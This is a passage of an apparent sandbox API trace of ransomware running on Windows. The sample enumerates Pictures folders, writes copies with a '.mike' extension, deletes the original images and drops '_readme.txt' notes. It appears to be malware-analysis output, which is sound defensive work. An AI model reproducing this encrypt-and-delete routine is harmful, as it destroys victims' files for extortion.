lpOldMode=0x2aefa8) returned 1 [0154.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0155.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0155.013] WriteFile (in: hFile=0x1c8, lpBuffer=0x21bf254*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21bf254*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0155.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\yQREJ0DYQ_biQRQz.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\yQREJ0DYQ_biQRQz.png.mike", lpFilePart=0x0) returned 0x7c [0155.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0155.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0155.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\yQREJ0DYQ_biQRQz.png.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\yQREJ0DYQ_biQRQz.png.mike", lpFilePart=0x0) returned 0x7c [0155.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0155.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0155.015] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\yQREJ0DYQ_biQRQz.png", dwFileAttributes=0x80) returned 1 [0155.015] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\yQREJ0DYQ_biQRQz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\yqrej0dyq_biqrqz.png")) returned 1 [0155.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0155.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0155.018] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\_readme.txt", lpFilePart=0x0) returned 0x6e [0155.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd8) returned 1 [0155.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefd4) returned 1 [0155.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0155.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0155.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0155.021] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0155.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0155.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0155.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0155.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0155.022] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\YvTnZ3SulGu.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\YvTnZ3SulGu.png.mike", lpFilePart=0x0) returned 0x77 [0155.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0155.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0155.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\YvTnZ3SulGu.png", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\YvTnZ3SulGu.png", lpFilePart=0x0) returned 0x72 [0155.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0155.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0155.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.025] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0155.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0155.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0155.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0155.044] WriteFile (in: hFile=0x1c8, lpBuffer=0x2231de0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2231de0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0155.045] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\YvTnZ3SulGu.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\YvTnZ3SulGu.png.mike", lpFilePart=0x0) returned 0x77 [0155.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0155.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0155.046] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\YvTnZ3SulGu.png.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\YvTnZ3SulGu.png.mike", lpFilePart=0x0) returned 0x77 [0155.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0155.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0155.046] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\YvTnZ3SulGu.png", dwFileAttributes=0x80) returned 1 [0155.047] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\YvTnZ3SulGu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\yvtnz3sulgu.png")) returned 1 [0155.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0155.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0155.057] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\_readme.txt", lpFilePart=0x0) returned 0x6e [0155.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd8) returned 1 [0155.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefd4) returned 1 [0155.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0155.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c7ea0, ftCreationTime.dwHighDateTime=0x1d4d451, ftLastAccessTime.dwLowDateTime=0x25afb740, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25b47a00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957ab650, ftCreationTime.dwHighDateTime=0x1d4ce80, ftLastAccessTime.dwLowDateTime=0x608a2970, ftLastAccessTime.dwHighDateTime=0x1d4c68e, ftLastWriteTime.dwLowDateTime=0x608a2970, ftLastWriteTime.dwHighDateTime=0x1d4c68e, nFileSizeHigh=0x0, nFileSizeLow=0x8866, dwReserved0=0x0, dwReserved1=0x0, cFileName="aPoAj8.gif", cAlternateFileName="")) returned 1 [0155.061] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x259f0da0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x259f0da0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25a89320, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x147e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gYO-l-JpXBy3mKQ.png.mike", cAlternateFileName="GYO-L-~1.MIK")) returned 1 [0155.061] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x154d390, ftCreationTime.dwHighDateTime=0x1d4c640, ftLastAccessTime.dwLowDateTime=0x72038b90, ftLastAccessTime.dwHighDateTime=0x1d4c93d, ftLastWriteTime.dwLowDateTime=0x72038b90, ftLastWriteTime.dwHighDateTime=0x1d4c93d, nFileSizeHigh=0x0, nFileSizeLow=0xd0a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="hZ-hjkfwHXSm6n.bmp", cAlternateFileName="HZ-HJK~1.BMP")) returned 1 [0155.061] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25aaf480, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25aaf480, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25ad55e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x18190, dwReserved0=0x0, dwReserved1=0x0, cFileName="yQREJ0DYQ_biQRQz.png.mike", cAlternateFileName="YQREJ0~1.MIK")) returned 1 [0155.062] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25afb740, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25afb740, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25b218a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x13410, dwReserved0=0x0, dwReserved1=0x0, cFileName="YvTnZ3SulGu.png.mike", cAlternateFileName="YVTNZ3~1.MIK")) returned 1 [0155.062] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25a89320, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25a89320, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25b47a00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0155.062] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25a89320, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25a89320, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25b47a00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0155.063] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0155.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0155.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0155.063] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.063] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.064] CoTaskMemFree (pv=0x508980) [0155.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.064] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y", lpFilePart=0x0) returned 0x5a [0155.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0155.065] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x712fd260, ftCreationTime.dwHighDateTime=0x1d4d044, ftLastAccessTime.dwLowDateTime=0x466d8320, ftLastAccessTime.dwHighDateTime=0x1d4d291, ftLastWriteTime.dwLowDateTime=0x466d8320, ftLastWriteTime.dwHighDateTime=0x1d4d291, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.065] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81227450, ftCreationTime.dwHighDateTime=0x1d4cf4c, ftLastAccessTime.dwLowDateTime=0xd86dc120, ftLastAccessTime.dwHighDateTime=0x1d4c564, ftLastWriteTime.dwLowDateTime=0xd86dc120, ftLastWriteTime.dwHighDateTime=0x1d4c564, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="99q8DF", cAlternateFileName="")) returned 1 [0155.065] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b37950, ftCreationTime.dwHighDateTime=0x1d4cb76, ftLastAccessTime.dwLowDateTime=0xb88d6780, ftLastAccessTime.dwHighDateTime=0x1d4d292, ftLastWriteTime.dwLowDateTime=0xb88d6780, ftLastWriteTime.dwHighDateTime=0x1d4d292, nFileSizeHigh=0x0, nFileSizeLow=0xe216, dwReserved0=0x0, dwReserved1=0x0, cFileName="H54h gwe88d1.bmp", cAlternateFileName="H54HGW~1.BMP")) returned 1 [0155.066] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e675760, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0x255b8ca0, ftLastAccessTime.dwHighDateTime=0x1d4cf7f, ftLastWriteTime.dwLowDateTime=0x255b8ca0, ftLastWriteTime.dwHighDateTime=0x1d4cf7f, nFileSizeHigh=0x0, nFileSizeLow=0x6679, dwReserved0=0x0, dwReserved1=0x0, cFileName="jgxj8NICsf0.png", cAlternateFileName="JGXJ8N~1.PNG")) returned 1 [0155.066] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5ef2800, ftCreationTime.dwHighDateTime=0x1d4ce70, ftLastAccessTime.dwLowDateTime=0x7f981b80, ftLastAccessTime.dwHighDateTime=0x1d4cee3, ftLastWriteTime.dwLowDateTime=0x7f981b80, ftLastWriteTime.dwHighDateTime=0x1d4cee3, nFileSizeHigh=0x0, nFileSizeLow=0xe7db, dwReserved0=0x0, dwReserved1=0x0, cFileName="PpaypRFbyCiXvD.bmp", cAlternateFileName="PPAYPR~1.BMP")) returned 1 [0155.067] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0155.067] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0155.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0155.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0155.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0155.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0155.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0155.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0155.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0155.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0155.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0155.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0155.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\jgxj8NICsf0.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\jgxj8NICsf0.png.mike", lpFilePart=0x0) returned 0x6f [0155.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0155.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0155.071] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\jgxj8NICsf0.png", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\jgxj8NICsf0.png", lpFilePart=0x0) returned 0x6a [0155.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0155.071] SetThreadErrorMode 